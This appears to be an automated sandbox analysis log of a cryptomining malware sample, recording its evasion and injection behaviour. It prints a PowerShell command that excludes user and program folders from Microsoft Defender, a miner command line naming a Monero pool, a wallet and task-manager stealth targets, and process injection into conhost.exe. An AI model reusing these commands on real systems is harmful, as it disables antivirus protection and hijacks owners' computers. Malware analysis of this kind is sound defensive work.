                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B44C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HZTZHP9CUFCWEVHQXZYBPHKBGFBR2QHCMSZ9X" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.1.0" --TLS --CINIT-IDLE-WAIT=1 --CINIT-IDLE-CPU=100 --CINIT-ID="GZSSIANTHTXZDGGZ"]]
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B44C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXECSV
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\CONHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=456FXIA3DJT9FGZTGXSZZ1CTCYIQQWSGEGW66V9TJ4ZVBXFP8UF1SBNANBHZTZHP9CUFCWEVHQXZYBPHKBGFBR2QHCMSZ9X--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.1.0--TLS--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=100--CINIT-ID=GZSSIANTHTXZDGGZ
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HZTZHP9CUFCWEVHQXZYBPHKBGFBR2QHCMSZ9X" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.1.0" --TLS --CINIT-IDLE-WAIT=1 --CINIT-IDLE-CPU=100 --CINIT-ID="GZSSIANTHTXZDGGZ"
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B44C4000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFAAB424381 str word ptr [eax]13_2_00007FFAAB424381
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4937Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4917Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6795Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2762Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3624Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1882Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6926
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 498
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6958
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2447
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 2703
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 7296
                        Source: C:\Program Files\xjfgcnhmcvxy.exeDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                        Source: C:\Program Files\xjfgcnhmcvxy.exeDropped PE file which has not been started: C:\Windows\Temp\tkfgvduf.tmpJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 4937 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 4917 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep count: 6795 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep count: 2762 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 3624 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep count: 1882 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 396Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 644Thread sleep count: 6926 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep count: 498 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep count: 6958 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep count: 2447 > 30
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: powershell.exe, 00000007.00000002.1421656373.0000026C805C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMSFT_NetEventVmNetworkAdatper.format.ps1xmll
                        Source: powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000022.00000002.2615840139.000002B9B43E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeCode function: 0_2_00007FF624AC11DC SetUnhandledExceptionFilter,malloc,0_2_00007FF624AC11DC
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A21180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,28_2_00007FF6B1A21180
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A2A6E9 SetUnhandledExceptionFilter,28_2_00007FF6B1A2A6E9
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A32294 SetUnhandledExceptionFilter,_wgetenv,28_2_00007FF6B1A32294

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeNtQuerySystemInformation: Direct from: 0x7FF723474B7EJump to behavior
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeNtQuerySystemInformation: Direct from: 0x7FF624AC4B7EJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonlyJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonlyJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeThread register set: target process: 2384Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeThread register set: target process: 8180Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeMemory written: C:\Windows\System32\conhost.exe base: C0461C7010Jump to behavior
